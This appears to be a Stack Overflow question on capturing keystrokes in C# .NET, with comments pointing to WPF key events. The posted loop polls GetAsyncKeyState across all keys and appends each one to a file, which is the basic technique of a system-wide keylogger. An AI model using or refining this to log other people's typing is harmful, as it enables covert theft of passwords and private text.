# How do I properly capture keyboard strokes C# .NET

Tags: c#, .net, keyboard, keystroke

I am using this code

```
    KeysConverter keyConverter = new KeysConverter();
    String text = "";

    while (true)
    {
        Thread.Sleep(10);
        for (Int32 i = 0; i < 255; i++)
        {
            int key = GetAsyncKeyState(i);
            if (key == 1 || key == -32767)
            {
                text = keyConverter.ConvertToString(i);
                using (StreamWriter sw = File.AppendText(path))
                {
                    sw.WriteLine(text);
                }
            }
        }
    }
```

to record keys and save them to a file.

Right now if I start the application and type a capitalized A it prints out `shift lshift a` and thats not what I want it to do.
I want to simplify it to just print out a capitalized A

Comment: There are different ways to do this. Depending whether is a WPF application or ConsoleApp or WinForm or ASP.NET MVC (i.e. in knockout you can use valueUpdate: 'keyup'). What I suggest is that you can start from searching what is an "event" in general programming paradigms.

Comment: Its a WPF. So what you are suggesting is that I bind keyevent such as KeyDown for example?

Comment: Another issue is on input stream. Say what if the input string is "ABCD<backspace/><backspace/><backspace/>". Are you going to get "A" or "ABCD"?
If it's a simple control just subscribe to KeyDown or KeyUp, depending on what you expect the input behavior to be.
If it's a framework control in your proj, try command binding.

Comment: You can filter result by selecting KeyEventArgs.Key so you won't get ctrl/shift/alt/delete/pgup/pgdns.